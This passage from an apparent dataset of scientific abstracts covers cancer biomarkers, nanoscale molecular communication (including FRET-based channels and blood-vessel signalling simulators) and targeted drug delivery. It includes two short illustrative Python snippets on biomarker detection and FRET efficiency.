increased the amounts of CXCR4 and SDF-1α and activated the SDF-1α/CXCR4 axis, inducing colony and sphere formation. Finally, we identified the subcellular localization of CD164 in the nucleus and cytosol and found that nuclear CD164 might be involved in the regulation of the activity of the CXCR4 promoter. Conclusions: Our findings suggest that the increased expression of CD164 is involved in ovarian cancer progression via the SDF-1α/CXCR4 axis, which promotes tumorigenicity. Thus, CD164 may serve as a potential ovarian cancer biomarker, and targeting CD164 may serve as a therapeutic modality in the management of high-grade ovarian tumors. --- paper_title: Plasma Osteopontin Is a Useful Diagnostic Biomarker for Advanced Non-Small Cell Lung Cancer paper_content: Background ::: Osteopontin (OPN) and carbonic anhydrase IX (CAIX), which are expressed on the surface of tumor cells, are associated with hypoxia during tumor development and progression. However, the roles of these proteins in the plasma of patients with non-small cell lung cancer (NSCLC) are poorly understood.
Herein, we hypothesized that plasma OPN and CAIX levels could be used as diagnostic and prognostic tumor markers in patients with NSCLC. --- paper_title: A Molecular Communication System in Blood Vessels for Tumor Detection paper_content: This paper shows a proposal of a biological nano-communication system established in a blood vessel, aiming to support the detection and treatment of tumors. This system could either be used for diagnostic purposes in the early stage of a disease or to check any relapse of a previous disease already treated. In our proposal, the tumor detection happens through revealing tumor biomarkers on the cell surface, such as the CD47 protein. This detection takes advantage of some recent proposals for implementing nanorobot transport systems through modified flagellated bacteria. When a biomarker is detected, a molecular communication system is used for distributing the information over a number of nano-machines. These machines have a size similar to the white blood cells, so that they can flow through the vessel at the speed of the largest particles. The transported information is detected extra-body, through the use of smart probes, which triggers a decision tree in order to estimate the nature of the tumor and its most likely location. --- paper_title: Apolipoprotein C-II is a potential serum biomarker as a prognostic factor of locally advanced cervical cancer after chemoradiation therapy. paper_content: PURPOSE ::: To determine pretreatment serum protein levels for generally applicable measurement to predict chemoradiation treatment outcomes in patients with locally advanced squamous cell cervical carcinoma (CC). ::: ::: ::: METHODS AND MATERIALS ::: In a screening study, measurements were conducted twice. At first, 6 serum samples from CC patients (3 with no evidence of disease [NED] and 3 with cancer-caused death [CD]) and 2 from healthy controls were tested. Next, 12 serum samples from different CC patients (8 NED, 4 CD) and 4 from healthy controls were examined. Subsequently, 28 different CC patients (18 NED, 10 CD) and 9 controls were analyzed in the validation study. Protein chips were treated with the sample sera, and the serum protein pattern was detected by surface-enhanced laser desorption and ionization-time-of-flight mass spectrometry (SELDI-TOF MS). Then, single MS-based peptide mass fingerprinting (PMF) and tandem MS (MS/MS)-based peptide/protein identification methods were used to identify the protein corresponding to the detected peak. A turbidimetric assay was then used to measure the levels of the protein that indicated the best match with this peptide peak. ::: ::: ::: RESULTS ::: The same peak at 8918 m/z was identified in both screening studies. Neither the screening study nor the validation study had significant differences in the appearance of this peak between the controls and NED. However, the intensity of the peak in CD was significantly lower than that of controls and NED in both pilot studies (P=.02, P=.04) and the validation study (P=.01, P=.001). The protein that indicated the best match with this peptide peak at 8918 m/z was identified as apolipoprotein C-II (ApoC-II) using PMF and MS/MS methods. The turbidimetric assay showed that the mean serum levels of ApoC-II tended to decrease in the CD group when compared with the NED group (P=.078). ::: ::: ::: CONCLUSION ::: ApoC-II could be used as a biomarker for predicting and estimating the radiation treatment outcome of patients with CC.
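In the blood-vessel tumor-detection abstract above, nano-machines report CD47 biomarker detections that are collected extra-body and fed to a decision stage. One simple way such a count-based decision could be formalized is a Poisson likelihood-ratio test; the detection rates and prior below are illustrative assumptions, not parameters of the cited system.

```python
import math

RATE_HEALTHY = 1.5  # assumed mean biomarker reports per window without a tumor
RATE_TUMOR = 8.0    # assumed mean reports when CD47-overexpressing cells are present

def tumor_likely(report_count, prior_tumor=0.01):
    """Return True when the posterior probability of a tumor exceeds 0.5,
    assuming Poisson-distributed report counts under both hypotheses."""
    def poisson_pmf(k, lam):
        return math.exp(-lam) * lam ** k / math.factorial(k)
    p_tumor = poisson_pmf(report_count, RATE_TUMOR) * prior_tumor
    p_healthy = poisson_pmf(report_count, RATE_HEALTHY) * (1 - prior_tumor)
    return p_tumor / (p_tumor + p_healthy) > 0.5

# Under these assumed rates: tumor_likely(2) -> False, tumor_likely(9) -> True
```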
--- paper_title: Endovascular mobile sensor network for detecting circulating tumoral cells paper_content: This paper analyzes the communications and medical potentials arising from establishing nano-scale communications making use of the stent tubular structures in blood vessels. Most of stent implants (both bare metal and drug eluiting stents) happens in coronary arteries for supporting weak endothelial points and counteracting the obstructing effects of arthrosclerosis. Such structures have continuously inspired researchers for introducing additional functions to the mere mechanical sustain of vessels. After a review of the current literature, we propose an original use of stents for monitoring CD47 receptors bearing cells and provide effective diagnostic and prognostic information. We can also perform the detection of different cancer markers, and then integrate this information. These monitoring functions and the event notifications makes used of nano-scale communications. Through a well established simulator of biological nano-scale communications, we will gain significant insights about the establishment of these types of communications happening between different sections of the stent structure. The information exchanges is assumed to be collected by nano-sensors of tumor cells. The outcome of the research is the characterization of the channel transmission capabilities. When considering cost benefit of these expensive smart stents, we suggest a wider perspective where oncologists may join the team of future interventional cardiologists. Thus, our system creates a link between cancer detection, stent devices, and body area networks to P5 medicine. --- paper_title: Carcinoembryonic antigen (CEA) as tumor marker in lung cancer. paper_content: The use of CEA as a prognostic and predictive marker in patients with lung cancer is widely debated. The aim of this review was to evaluate the results from studies made on this subject. Using the search words "CEA", "tumor markers in lung cancer", "prognostic significance", "diagnostic significance" and "predictive significance", a search was carried out on PubMed. Exclusion criteria was articles never published in English, articles before 1981 and articles evaluating tumor markers in lung cancer not involving CEA. Initially 217 articles were found, and 34 were left after selecting those relevant for the present study. Four of these included both Non-Small Cell Lung Cancer (NSCLC) and Small Cell Lung Cancer (SCLC) patients, and 31 dealt solely with NSCLC patients. Regarding SCLC no studies showed that serum level of CEA was a prognostic marker for overall survival (OS). The use of CEA serum level as a prognostic marker in NSCLC was investigated in 23 studies and the use of CEA plasma level in two. In 18 (17 serum, 1 plasma) of these studies CEA was found to be a useful prognostic marker for either OS, recurrence after surgery or/and progression free survival (PFS) in NSCLC patients. Interestingly, an overweight of low stage (stage I-II) disease and adenocarcinoma (AC) patients were observed in this group. The remaining 7 studies (6 serum, 1 plasma) contained an overweight of patients with squamous carcinoma (SQ). One study found evidence for that a tumor marker index (TMI), based on preoperative CEA and CYFRA21-1 serum levels, is useful as a prognostic marker for OS in NSCLC. Six studies evaluated the use of CEA as a predictive marker for risk of recurrence and risk of death in NSCLC patients. 
Four of these studies found, that CEA was useful as a predictive marker for risk of recurrence and risk of death measured over time. No studies found CEA levels useful as a diagnostic marker for lung cancer. With regard to NSCLC the level of CEA measured in tumor tissue in NSCLC patients, were not of prognostic, diagnostic or predictive significance for OS or recurrence after treatment. In one study CEA level was measured in Pleural Lavage Fluid (PLF) it was here found to be useful as prognostic markers for overall survival (OS) after surgery. In conclusion serum level of CEA carries prognostic and predictive information of risk of recurrence and of death in NSCLC independent of treatment or study design. The observation that TMI index could be a potential prognostic marker for OS in NSCLC is interesting. Future studies may benefit from evaluating more than one marker at a time, which may possibly create a more precise index for prognosis and recurrence in lung cancer, than is possible by the use of single biomarkers. --- paper_title: Mobile Ad Hoc Nanonetworks with Collision-Based Molecular Communication paper_content: Recent developments in nanotechnology have enabled the fabrication of nanomachines with very limited sensing, computation, communication, and action capabilities. The network of communicating nanomachines is envisaged as nanonetworks that are designed to accomplish complex tasks such as drug delivery and health monitoring. For the realization of future nanonetworks, it is essential to develop novel and efficient communication and networking paradigms. In this paper, the first step toward designing a mobile ad hoc molecular nanonetwork (MAMNET) with electrochemical communication is taken. MAMNET consists of mobile nanomachines and infostations that share nanoscale information using electrochemical communication whenever they have a physical contact with each other. In MAMNET, the intermittent connectivity introduced by the mobility of nanomachines and infostations is a critical issue to be addressed. An analytical framework that incorporates the effect of mobility into the performance of electrochemical communication among nanomachines is presented. Using the analytical model, numerical analysis for the performance evaluation of MAMNET is obtained. Results reveal that MAMNET achieves adequately high throughput to enable frontier nanonetwork applications with acceptable communication latency. --- paper_title: New paradigm for tumor theranostic methodology using bacteria-based microrobot paper_content: We propose a bacteria-based microrobot (bacteriobot) based on a new fusion paradigm for theranostic activities against solid tumors. We develop a bacteriobot using the strong attachment of bacteria to Cy5.5-coated polystyrene microbeads due to the high-affinity interaction between biotin and streptavidin. The chemotactic responses of the bacteria and the bacteriobots to the concentration gradients of lysates or spheroids of solid tumors can be detected as the migration of the bacteria and/or the bacteriobots out of the central region toward the side regions in a chemotactic microfluidic chamber. The bacteriobots showed higher migration velocity toward tumor cell lysates or spheroids than toward normal cells. In addition, when only the bacteriobots were injected to the CT-26 tumor mouse model, Cy5.5 signal was detected from the tumor site of the mouse model. In-vitro and in-vivo tests verified that the bacteriobots had chemotactic motility and tumor targeting ability. 
The new microrobot paradigm in which bacteria act as microactuators and microsensors to deliver microstructures to tumors can be considered a new theranostic methodology for targeting and treating solid tumors. --- paper_title: Multi-input RNAi-based logic circuit for identification of specific cancer cells. paper_content: Engineered biological systems that integrate multi-input sensing, sophisticated information processing, and precisely regulated actuation in living cells could be useful in a variety of applications. For example, anticancer therapies could be engineered to detect and respond to complex cellular conditions in individual cells with high specificity. Here, we show a scalable transcriptional/posttranscriptional synthetic regulatory circuit--a cell-type "classifier"--that senses expression levels of a customizable set of endogenous microRNAs and triggers a cellular response only if the expression levels match a predetermined profile of interest. We demonstrate that a HeLa cancer cell classifier selectively identifies HeLa cells and triggers apoptosis without affecting non-HeLa cell types. This approach also provides a general platform for programmed responses to other complex cell states. --- paper_title: Selective glycoprotein detection through covalent templating and allosteric click-imprinting paper_content: Many glycoproteins are intimately linked to the onset and progression of numerous heritable or acquired diseases of humans, including cancer. Indeed the recognition of specific glycoproteins remains a significant challenge in analytical method and diagnostic development. Herein, a hierarchical bottom-up route exploiting reversible covalent interactions with boronic acids and so-called click chemistry for the fabrication of glycoprotein selective surfaces that surmount current antibody constraints is described. The self-assembled and imprinted surfaces, containing specific glycoprotein molecular recognition nanocavities, confer high binding affinities, nanomolar sensitivity, exceptional glycoprotein specificity and selectivity with as high as 30 fold selectivity for prostate specific antigen (PSA) over other glycoproteins. This synthetic, robust and highly selective recognition platform can be used in complex biological media and be recycled multiple times with no performance decrement. --- paper_title: Extracellular vesicles: biology and emerging therapeutic opportunities paper_content: Within the past decade, extracellular vesicles have emerged as important mediators of intercellular communication, being involved in the transmission of biological signals between cells in both prokaryotes and higher eukaryotes to regulate a diverse range of biological processes. In addition, pathophysiological roles for extracellular vesicles are beginning to be recognized in diseases including cancer, infectious diseases and neurodegenerative disorders, highlighting potential novel targets for therapeutic intervention. Moreover, both unmodified and engineered extracellular vesicles are likely to have applications in macromolecular drug delivery. Here, we review recent progress in understanding extracellular vesicle biology and the role of extracellular vesicles in disease, discuss emerging therapeutic opportunities and consider the associated challenges. --- paper_title: Nanonetworks: a new frontier in communications paper_content: Nanotechnology is enabling the development of devices in a scale ranging from one to a few one hundred nanometers. 
Nanonetworks, i.e., the interconnection of nano-scale devices, are expected to expand the capabilities of single nano-machines by allowing them to cooperate and share information. Traditional communication technologies are not directly suitable for nanonetworks mainly due to the size and power consumption of existing transmitters, receivers and additional processing components. All these define a new communication paradigm that demands novel solutions such as nano-transceivers, channel models for the nano-scale, and protocols and architectures for nanonetworks. In this talk, first the state-of-the-art in nano-machines, including architectural aspects, expected features of future nano-machines, and current developments are presented for a better understanding of the nanonetwork scenarios. Moreover, nanonetworks features and components are explained and compared with traditional communication networks. Novel nano-antennas based on nano-materials as well as the terahertz band are investigated for electromagnetic communication in nanonetworks. Furthermore, molecular communication mechanisms are presented for short-range networking based on ion signaling and molecular motors, for medium-range networking based on flagellated bacteria and nanorods, as well as for long-range networking based on pheromones and capillaries. Finally, open research challenges such as the development of network components, molecular communication theory, and new architectures and protocols, which need to be solved in order to pave the way for the development and deployment of nanonetworks within the next couple of decades are presented. --- paper_title: From P0 to P6 medicine, a model of highly participatory, narrative, interactive, and “augmented” medicine: some considerations on Salvatore Iaconesi’s clinical story paper_content: Salvatore Iaconesi was recently diagnosed with a brain tumor. He decided to share his clinical records not only with doctors but with everybody who wishes to find him a cure. “Because cure is not unique,” he emphasizes “there are cures for the body and cures for the soul, and everyone, from a painter to a musician, can find me a cure. Please, feel free to take my clinical history for example and let it become a game, a video, a music, a picture, whatever you like.” The emblematic hallmark of the changing times, Salvatore Iaconesi’s case is an example of how many profound revolutions and steps medicine has undertaken during the past few centuries. Stemming from a form of remote medical paternalism and arriving at the concept of a therapeutic alliance, medicine nowadays faces challenges and opportunities at a level before unforeseeable and unimaginable. The new concept of P6 medicine (personalized, predictive, preventive, participatory, psychocognitive, and public) is discussed, together with its profound implications. --- paper_title: Internalization of CD40 regulates its signal transduction in vascular endothelial cells paper_content: Abstract The CD40 ligand (CD40L)-CD40 dyad can ignite proinflammatory and procoagulatory activities of the vascular endothelium in the pathogenesis and progression of atherosclerosis. Besides being expressed on the activated CD4 + T cell surface (mCD40L), the majority of circulating CD40L reservoir (sCD40L) in plasma is released from stimulated platelets. It remains debatable which form of CD40L triggers endothelial inflammation. 
Here, we demonstrate that the agonistic antibody of CD40 (G28.5), which mimics the action of sCD40L, induces rapid endocytosis of CD40 independent of TRAF2/3/6 binding while CD40L expressed on the surface of HEK293A cells captures CD40 at the cell conjunction. Forced internalization of CD40 by constitutively active mutant of Rab5 preemptively activates NF-κB pathway, suggesting that CD40 was able to form an intracellular signal complex in the early endosomes. Internalized CD40 exhibits different patterns of TRAF2/3/6 recruitment and Akt phosphorylation from the membrane anchored CD40 complex. Finally, mCD40L but not sCD40L induces the upregulation of proinflammatory cytokines and cell adhesion factors in the primary human vascular endothelial cells in vitro, although both forms of CD40L activate NF-κB pathway. These results therefore may help understand the molecular mechanism of CD40L signaling that contributes to the pathophysiology of atherosclerosis. --- paper_title: Simulating an in vitro experiment on nanoscale communications by using BiNS2 paper_content: Abstract Nanoscale communications is an emergent research topic with potential applications in many fields. In order to design nanomachines able to exploit the communication potentials of nanoscale environments, it is necessary to identify the basic communication mechanisms and the relevant parameters. In this paper, we show how system parameters can be derived by suitably matching the results of in vitro experiments with those obtained via simulations by using the BiNS2 simulator. In order to scale the simulation from micrometric settings, with timescale in the order of seconds, to real experiments lasting tens of minutes with millimetric size, we enhanced the BiNS2 simulator by introducing a space partition algorithm based on the octree. In this way, the simulator can exploit the high level of parallelism of modern multicore computer architectures. We have used this technique for simulating an experiment focused on the communication between platelets and endothelium through the diffusion of nanoparticles. Simulation results match experimental data, thus allowing us to infer useful information on the receiver operation. --- paper_title: Simulation of Molecular Signaling in Blood Vessels: Software Design and Application to Atherogenesis paper_content: Abstract This paper presents a software platform, named BiNS2, able to simulate diffusion-based molecular communications with drift inside blood vessels. The contribution of the paper is twofold. First a detailed description of the simulator is given, under the software engineering point of view, by highlighting the innovations and optimizations introduced. Their introduction into the previous version of the BiNS simulator was needed to provide the functions for simulating molecular signaling and communication potentials inside bounded spaces. The second contribution consists of the analysis, carried out by using BiNS2, of a specific communication process happening inside blood vessels, the atherogenesis, which is the initial phase of the formation of atherosclerotic plaques, due to the abnormal signaling between platelets and endothelium. From a communication point of view, platelets act as mobile transmitters, endothelial cells are fixed receivers, sticky to the vessel walls, and the transmitted signal is made of bursts of molecules emitted by platelets. 
The simulator allows for the evaluation of the channel latency and the footprint on the vessel wall of the transmitted signal as a function of the transmitter distance from the vessels wall, the signal strength, and the receiver sensitivity. --- paper_title: Influence of Red Blood Cells on Nanoparticle Targeted Delivery in Microcirculation paper_content: Multifunctional nanomedicine holds considerable promise as the next generation of medicine that allows for targeted therapy with minimal toxicity. Most current studies on nanoparticle (NP) drug delivery consider a Newtonian fluid with suspending NPs. However, blood is a complex biological fluid composed of deformable cells, proteins, platelets, and plasma. For blood flow in capillaries, arterioles and venules, the particulate nature of the blood needs to be considered in the delivery process. The existence of the cell-free-layer and NP–cell interaction will largely influence both the dispersion and binding rates, thus impact targeted delivery efficacy. In this paper, a particle–cell hybrid model is developed to model NP transport, dispersion, and binding dynamics in blood suspension. The motion and deformation of red blood cells (RBCs) is captured through the Immersed Finite Element Method. The motion and adhesion of individual NPs are tracked through Brownian adhesion dynamics. A mapping algorithm and an interaction potential function are introduced to consider the cell–particle collision. NP dispersion and binding rates are derived from the developed model under various rheology conditions. The influence of red blood cells, vascular flow rate, and particle size on NP distribution and delivery efficacy is characterized. A non-uniform NP distribution profile with higher particle concentration near the vessel wall is observed. Such distribution leads to over 50% higher particle binding rate compared to the case without RBC considered. The tumbling motion of RBCs in the core region of the capillary is found to enhance NP dispersion, with dispersion rate increasing as shear rate increases. Results from this study contribute to the fundamental understanding and knowledge on how the particulate nature of blood influences NP delivery, which will provide mechanistic insights on the nanomedicine design for targeted drug delivery applications. --- paper_title: Modeling CD40-Based Molecular Communications in Blood Vessels paper_content: This paper presents a mathematical characterization of the main features of the molecular communication between platelets and endothelial cells via CD40 signaling during the initial phases of atherosclerosis, known also as atherogenesis. We demonstrate through laboratory experimentation that the release of soluble CD40L molecules from platelets in a fluid medium is enough to trigger expression of adhesion molecules on endothelial cell’s surface; that is, physical contact between the platelets and the endothelial cells is not necessary. We also propose the mathematical model of this communication, and we quantify the model parameters by matching the experiment results to the model. In addition, this mathematical model of platelet-endothelium interaction, along with propagation models typical of blood vessels, is incorporated into a simulation platform. 
Analysis of the simulation results indicates that these enhancements render the simulator a useful tool upon which to base discussion for planning research, and has the potential to be an important step in the understanding, diagnosis, and treatment of cardiovascular diseases. --- paper_title: Predictive, personalized, preventive, participatory (P4) cancer medicine paper_content: Medicine will move from a reactive to a proactive discipline over the next decade--a discipline that is predictive, personalized, preventive and participatory (P4). P4 medicine will be fueled by systems approaches to disease, emerging technologies and analytical tools. There will be two major challenges to achieving P4 medicine--technical and societal barriers--and the societal barriers will prove the most challenging. How do we bring patients, physicians and members of the health-care community into alignment with the enormous opportunities of P4 medicine? In part, this will be done by the creation of new types of strategic partnerships--between patients, large clinical centers, consortia of clinical centers and patient-advocate groups. For some clinical trials it will necessary to recruit very large numbers of patients--and one powerful approach to this challenge is the crowd-sourced recruitment of patients by bringing large clinical centers together with patient-advocate groups. --- paper_title: The Role of Platelets in Atherothrombosis paper_content: Platelets have evolved highly specialized adhesion mechanisms that enable cell-matrix and cell-cell interactions throughout the entire vasculature irrespective of the prevailing hemodynamic conditions. This unique property of platelets is critical for their ability to arrest bleeding and promote vessel repair. Platelet adhesion under conditions of high shear stress, as occurs in stenotic atherosclerotic arteries, is central to the development of arterial thrombosis; therefore, precise control of platelet adhesion must occur to maintain blood fluidity and to prevent thrombotic or hemorrhagic complications. Whereas the central role of platelets in hemostasis and thrombosis has long been recognized and well defined, there is now a major body of evidence supporting an important proinflammatory function for platelets that is linked to host defense and a variety of autoimmune and inflammatory diseases. In the context of the vasculature, experimental evidence indicates that the proinflammatory function of platelets can regulate various aspects of the atherosclerotic process, including its initiation and propagation. The mechanisms underlying the proatherogenic function of platelets are increasingly well defined and involve specific adhesive interactions between platelets and endothelial cells at atherosclerotic-prone sites, leading to the enhanced recruitment and activation of leukocytes. Through the release of chemokines, proinflammatory molecules, and other biological response modulators, the interaction among platelets, endothelial cells, and leukocytes establishes a localized inflammatory response that accelerates atherosclerosis. These inflammatory processes typically occur in regions of the vasculature experiencing low shear and perturbed blood flow, a permissive environment for leukocyte-platelet and leukocyte-endothelial interactions. 
Therefore, the concept has emerged that platelets are a central element of the atherothrombotic process and that future therapeutic strategies to combat this disease need to take into consideration both the prothrombotic and proinflammatory function of platelets. --- paper_title: Multi-Step FRET-Based Long-Range Nanoscale Communication Channel paper_content: Nanoscale communication based on Forster Resonance Energy Transfer (FRET) is a promising paradigm that allows future molecular-size machines to communicate with each other over distances up to 10 nm using the excited state energies of fluorescent molecules. In this study, we propose a novel nanoscale communication method based on multi-step FRET using identical fluorophores as relay nodes between communicating nanomachines, and utilizing multi-exciton transmission scheme in order to improve the limited range of the communication and achievable transmission rate over the nanoscale channel. We investigate two communication scenarios: immobile nanomachines communicating through a channel in a host material with linearly located relay nodes, and mobile nanomachines communicating through a channel in a 3-dimensional aqueous environment with randomly deployed relay nodes. We simulate the communication over these channels with realistic algorithms considering the high degree of randomness intrinsic to FRET phenomenon. Using the simulation results and following a Monte Carlo approach, we evaluate the performance of the channels by means of information theoretical capacity and interference probability. We show that multi-step FRET-based communication significantly outperforms the other biologically inspired nanocommunication techniques proposed so far in terms of maximum achievable data transmission rates. The results underline the compatibility and practicality of the FRET-based communication for several applications ranging from molecular computers to nanosensor networks. --- paper_title: Aptamers and Their Applications in Nanomedicine paper_content: Aptamers are composed of short RNA or single-stranded DNA sequences that, when folded into their unique 3D conformation, can bind to their targets with high specificity and affinity. Although functionally similar to protein antibodies, oligonucleotide aptamers offer several advantages over protein antibodies in biomedical and clinical applications. Through the enhanced permeability and retention effect, nanomedicines can improve the therapeutic index of a treatment and reduce side effects by enhancing accumulation at the disease site. However, this targets tumors passively and, thus, may not be ideal for targeted therapy. To construct ligand-directed "active targeting" nanobased delivery systems, aptamer-equipped nanomedicines have been tested for in vitro diagnosis, in vivo imaging, targeted cancer therapy, theranostic approaches, sub-cellular molecule detection, food safety, and environmental monitoring. This review focuses on the development of aptamer-conjugated nanomedicines and their application for in vivo imaging, targeted therapy, and theranostics. --- paper_title: QDs-DNA nanosensor for the detection of hepatitis B virus DNA and the single-base mutants. paper_content: We report here a quantum dots-DNA (QDs-DNA) nanosensor based on fluorescence resonance energy transfer (FRET) for the detection of the target DNA and single mismatch in hepatitis B virus (HBV) gene. 
The proposed one-pot DNA detection method is simple, rapid and efficient due to the elimination of the washing and separation steps. In this study, the water-soluble CdSe/ZnS QDs were prepared by replacing the trioctylphosphine oxide (TOPO) on the surface of QDs with 3-mercaptopropionic acid (MPA). Subsequently, oligonucleotides were attached to the QDs surface to form functional QDs-DNA conjugates. Along with the addition of DNA targets and Cy5-modified signal DNAs into the QDs-DNA conjugates, sandwiched hybrids were formed. The resulting assembly brings the Cy5 fluorophore, the acceptor, and the QDs, the donor, into proximity, leading to fluorescence emission from the acceptor by means of FRET on illumination of the donor. In order to efficiently detect single-base mutants in HBV gene, oligonucleotide ligation assay was employed. If there existed a single-base mismatch, which could be recognized by the ligase, the detection probe was not ligated and no Cy5 emission was produced due to the lack of FRET. The feasibility of the proposed method was also demonstrated in the detection of synthetic 30-mer oliginucleotide targets derived from the HBV with a sensitivity of 4.0nM by using a multilabel counter. The method enables a simple and efficient detection that could be potentially used for high throughput and multiplex detections of target DNA and the mutants. --- paper_title: A Communication Theoretical Analysis of FRET-Based Mobile Ad Hoc Molecular Nanonetworks paper_content: Nanonetworks refer to a group of nanosized machines with very basic operational capabilities communicating to each other in order to accomplish more complex tasks such as in-body drug delivery, or chemical defense. Realizing reliable and high-rate communication between these nanomachines is a fundamental problem for the practicality of these nanonetworks. Recently, we have proposed a molecular communication method based on Forster Resonance Energy Transfer (FRET) which is a nonradiative excited state energy transfer phenomenon observed among fluorescent molecules, i.e., fluorophores. We have modeled the FRET-based communication channel considering the fluorophores as single-molecular immobile nanomachines, and shown its reliability at high rates, and practicality at the current stage of nanotechnology. In this study, for the first time in the literature, we investigate the network of mobile nanomachines communicating through FRET. We introduce two novel mobile molecular nanonetworks: FRET-based mobile molecular sensor/actor nanonetwork (FRET-MSAN) which is a distributed system of mobile fluorophores acting as sensor or actor node; and FRET-based mobile ad hoc molecular nanonetwork (FRET-MAMNET) which consists of fluorophore-based nanotransmitter, nanoreceivers and nanorelays. We model the single message propagation based on birth-death processes with continuous time Markov chains. We evaluate the performance of FRET-MSAN and FRET-MAMNET in terms of successful transmission probability and mean extinction time of the messages, system throughput, channel capacity and achievable communication rates. --- paper_title: A Physical Channel Model and Analysis for Nanoscale Molecular Communications With Förster Resonance Energy Transfer (FRET) paper_content: In this study, a novel and physically realizable nanoscale communication paradigm is introduced based on a well-known phenomenon, Forster resonance energy transfer (FRET), for the first time in the literature. 
FRET is a nonradiative energy transfer process between fluorescent molecules based on the dipole-dipole interactions of molecules. Energy is transferred rapidly from a donor to an acceptor molecule in a close proximity such as 0 to 10 nm without radiation of a photon. Low dependence on the environmental factors, controllability of its parameters, and relatively wide transfer range make FRET a promising candidate to be used for a high-rate nanoscale communication channel. In this paper, the simplest form of the FRET-based molecular communication channel comprising a single transmitter-receiver nanomachine pair and an extended version of this channel with a relay nanomachine for long-range applications are modeled considering nanomachines as nanoscale electromechanical devices with some sensing, computing, and actuating capabilities. Furthermore, using the information theoretical approach, the capacities of these communication channels are investigated and the dependence of the capacity on some environmental and intrinsic parameters is analyzed. It is shown that the capacity can be increased by appropriately selecting the donor-acceptor pair, the medium, the intermolecular distance, and the orientation of the molecules. --- paper_title: A nanoscale communication channel with fluorescence resonance energy transfer (FRET) paper_content: In this study, a novel and physically realizable nanoscale communication paradigm is introduced based on a well-known phenomenon, Fluorescence Resonance Energy Transfer (FRET) for the first time in the literature. FRET is a nonradiative energy transfer process between fluorescent molecules based on the dipole-dipole interactions of molecules. Energy is transferred rapidly from a donor to an acceptor molecule in a close proximity such as 0 to 10 nm without radiation of a photon. Low dependency on the environmental factors, controllability of its parameters and relatively wide transfer range make FRET a promising candidate to be used for a high rate nanoscale communication channel. In this paper, the simplest form of the FRET-based molecular communication channel for a single transmitter and a single receiver nanomachine is modeled. Furthermore, using the information theoretical approach, the capacity of the point-to-point communication channel is investigated and the dependency of the capacity on some environmental and intrinsic parameters is analyzed. It is shown that the capacity can be increased by appropriately selecting the donor-acceptor pair, the medium, the intermolecular distance and the orientation of the molecules. --- paper_title: Diffusive Molecular Communication with Disruptive Flows paper_content: In this paper, we study the performance of detectors in a diffusive molecular communication environment where steady uniform flow is present. We derive the expected number of information molecules to be observed in a passive spherical receiver, and determine the impact of flow on the assumption that the concentration of molecules throughout the receiver is uniform. Simulation results show the impact of advection on detector performance as a function of the flow's magnitude and direction. We highlight that there are disruptive flows, i.e., flows that are not in the direction of information transmission, that lead to an improvement in detector performance as long as the disruptive flow does not dominate diffusion and sufficient samples are taken. 
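The FRET-based channel abstracts above all rest on the sharp distance dependence of Förster transfer, which is what limits single-step links to roughly 0-10 nm. The textbook single-step efficiency E = 1/(1 + (r/R0)^6) makes this concrete; the Förster radius below is an assumed typical dye-pair value, not one taken from the cited donor-acceptor choices.

```python
import numpy as np

def fret_efficiency(r_nm, r0_nm=6.0):
    """Textbook single-step FRET efficiency E = 1 / (1 + (r / R0)^6).

    r_nm  : donor-acceptor separation [nm]
    r0_nm : Förster radius [nm] (assumed typical value for an organic dye pair)
    """
    r = np.asarray(r_nm, dtype=float)
    return 1.0 / (1.0 + (r / r0_nm) ** 6)

# Efficiency collapses quickly beyond R0 (about 0.98 at 3 nm, 0.5 at 6 nm,
# 0.08 at 9 nm for R0 = 6 nm), which is why the multi-step FRET work above
# inserts relay fluorophores to extend the communication range.
print(fret_efficiency([3.0, 6.0, 9.0, 12.0]))
```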
--- paper_title: A Molecular Communication System Model for Particulate Drug Delivery Systems paper_content: The goal of a drug delivery system (DDS) is to convey a drug where the medication is needed, while, at the same time, preventing the drug from affecting other healthy parts of the body. Drugs composed of micro- or nano-sized particles (particulate DDS) that are able to cross barriers which prevent large particles from escaping the bloodstream are used in the most advanced solutions. Molecular communication (MC) is used as an abstraction of the propagation of drug particles in the body. MC is a new paradigm in communication research where the exchange of information is achieved through the propagation of molecules. Here, the transmitter is the drug injection, the receiver is the drug delivery, and the channel is realized by the transport of drug particles, thus enabling the analysis and design of a particulate DDS using communication tools. This is achieved by modeling the MC channel as two separate contributions, namely, the cardiovascular network model and the drug propagation network. The cardiovascular network model allows to analytically compute the blood velocity profile in every location of the cardiovascular system given the flow input by the heart. The drug propagation network model allows the analytical expression of the drug delivery rate at the targeted site given the drug injection rate. Numerical results are also presented to assess the flexibility and accuracy of the developed model. The study of novel optimization techniques for a more effective and less invasive drug delivery will be aided by this model, while paving the way for novel communication techniques for Intrabody communication networks. --- paper_title: Transmission Rate Control for Molecular Communication among Biological Nanomachines paper_content: In this paper, we discuss issues concerned with transmission rate control in molecular communication, an emerging communication paradigm for bio-nanomachines in an aqueous environment. In molecular communication, a group of bio-nanomachines acting as senders transmit molecules, the molecules propagate in the environment, and another group of bio-nanomachines acting as receivers chemically react to the molecules propagating in the environment. In the model of molecular communication considered in this paper, senders may transmit molecules at a high rate to accelerate the receiver reactions or to increase the throughput. However, if the senders transmit molecules faster than the receivers react, the excess molecules remain in the environment and eventually degrade or diffuse away, which results in loss of molecules or degradation in efficiency. Such a potential issue associated with throughput and efficiency is in this paper discussed as an optimization problem. A mathematical expression for an upper-bound on the throughput and efficiency is first derived to provide an insight into the impact of model parameters. The optimal transmission rates that maximize the throughput and efficiency are then numerically calculated and presented, and throughput and efficiency are shown to be in trade-off relationships in a wide range of transmission rates. Further, two classes of feedback-based transmission rate control schemes are designed for autonomous bio-nanomachines to dynamically control their transmission rates, respectively based on negative and positive feedback from the receivers. 
The numerical evaluation of the two transmission rate control schemes is then shown to provide useful guidelines for application developers to satisfy their design goals. --- paper_title: Simulation of Molecular Signaling in Blood Vessels: Software Design and Application to Atherogenesis paper_content: Abstract This paper presents a software platform, named BiNS2, able to simulate diffusion-based molecular communications with drift inside blood vessels. The contribution of the paper is twofold. First a detailed description of the simulator is given, under the software engineering point of view, by highlighting the innovations and optimizations introduced. Their introduction into the previous version of the BiNS simulator was needed to provide the functions for simulating molecular signaling and communication potentials inside bounded spaces. The second contribution consists of the analysis, carried out by using BiNS2, of a specific communication process happening inside blood vessels, the atherogenesis, which is the initial phase of the formation of atherosclerotic plaques, due to the abnormal signaling between platelets and endothelium. From a communication point of view, platelets act as mobile transmitters, endothelial cells are fixed receivers, sticky to the vessel walls, and the transmitted signal is made of bursts of molecules emitted by platelets. The simulator allows for the evaluation of the channel latency and the footprint on the vessel wall of the transmitted signal as a function of the transmitter distance from the vessels wall, the signal strength, and the 